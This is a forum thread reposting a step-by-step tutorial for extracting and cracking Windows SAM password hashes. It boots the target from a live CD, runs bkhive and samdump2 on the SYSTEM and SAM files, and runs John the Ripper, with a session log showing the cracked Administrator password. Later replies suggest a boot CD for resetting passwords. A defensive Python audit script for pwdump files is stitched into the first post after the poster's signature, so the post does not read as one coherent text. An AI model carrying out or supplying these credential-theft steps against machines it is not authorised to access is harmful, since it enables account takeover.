Cracking windows Administrator password


3 replies to this topic

#1 Ratna

    Newbie

  • Members
  • 39 posts

Posted 13 September 2006 - 07:15 AM

/* Tutorial by: IronGeek */



Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell's it's F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:
Linux Command:

mount /dev/hda1


Step 6. Change the present working directory to the ramdisk so we have space to work with the files we will be creating:
Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomo's Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32\config\SYSTEM, that's where it is on my XP Pro test box; on some systems it will be in C:\WINNT\system32\config\SYSTEM or perhaps on some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead; all later systems (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:
Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:
Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use; I'll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:
Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt


Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:
Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format "NT LM DES [32/32 BS]" automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the -f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:
Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


If dictionary attacks aren't working and you have a lot of time (as well as a fast computer) you can try John's incremental (brute force) mode and see if it gives you better results:
Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more than eight characters is pointless anyway if you have the LM hashes, since they are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output, here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is "monkey"):
Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#

PROGRAMMERS ARE ARTISTS
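One defensive use of the PWDump format file that Step 8 produces, as an added example (not code from the tutorial, from samdump2 or from John): an audit script that flags accounts whose LM hash is still being stored (i.e. the "disabled the storing of LM hashes" mitigation mentioned in Step 10 is not in effect), whose NT hash is that of an empty password, or whose LM second half reveals a password of at most seven characters. The sample dump and its hash values are constructed, apart from the two well-known empty-password constants.

```python
# Audit a pwdump-format dump (the "user:rid:lm:nt:::" lines samdump2 writes)
# for weak credential storage. Added example, not code from the tutorial,
# samdump2 or John. The sample dump below is constructed; apart from the two
# well-known empty-password constants, the hashes are arbitrary hex.

# LM hash of an empty password. Both 16-hex-digit halves are identical
# because LM hashes the 14-byte null-padded password as two 7-byte halves.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[16:]
# NT (MD4) hash of an empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dump, not real credentials.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:fedcba9876543210aad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
alice:1002:aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef:::
"""

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # blank, comment or malformed line: skip, don't crash
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_pwdump(text):
    """Return {user: [finding, ...]} for accounts with weak hash storage."""
    findings = {}
    for user, rid, lm, nt in parse_pwdump(text):
        notes = []
        if lm and lm != EMPTY_LM:
            # A real LM hash means NoLMHash is not in effect; John's LM mode
            # attacks each 7-character half independently.
            notes.append("lm_hash_stored")
            if lm[16:] == EMPTY_LM_HALF:
                # Second half hashed only padding: password is <= 7 chars.
                notes.append("password_at_most_7_chars")
        if nt == EMPTY_NT:
            notes.append("empty_password")
        if rid == 500 and notes:
            notes.append("builtin_administrator")
        if notes:
            findings[user] = notes
    return findings

if __name__ == "__main__":
    for user, notes in audit_pwdump(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(notes)}")
```

Accounts with no findings (alice above) are omitted from the result, so an empty dict means every account has LM storage disabled and a non-empty NT hash.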

#2 ujjwal

    WNSO International Co-ordination Committee

  • ICC
  • 391 posts

Posted 13 September 2006 - 11:45 AM

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier ;)
//,,
(,")> Let me think
<( )' about that...
,,J L,,

#3 Ratna

    Newbie

  • Members
  • 39 posts

Posted 14 September 2006 - 04:23 AM

QUOTE(ujjwal @ Sep 13 2006, 11:45 AM)

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier ;)


Can you tell me this process in some details?
I will be thankful for this.
Thanks
PROGRAMMERS ARE ARTISTS

#4 ujjwal

    WNSO International Co-ordination Committee

  • ICC
  • 391 posts

Posted 19 September 2006 - 05:24 AM

QUOTE(Ratna @ Sep 14 2006, 08:23 AM)

QUOTE(ujjwal @ Sep 13 2006, 11:45 AM)

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier ;)


Can you tell me this process in some details?
I will be thankful for this.
Thanks


here
http://chautari.wnso...?showtopic=9816

Hiren's Boot CD... it has all the tools you need. Plus it has a password resetting tool as well.

Very useful.
//,,
(,")> Let me think
<( )' about that...
,,J L,,
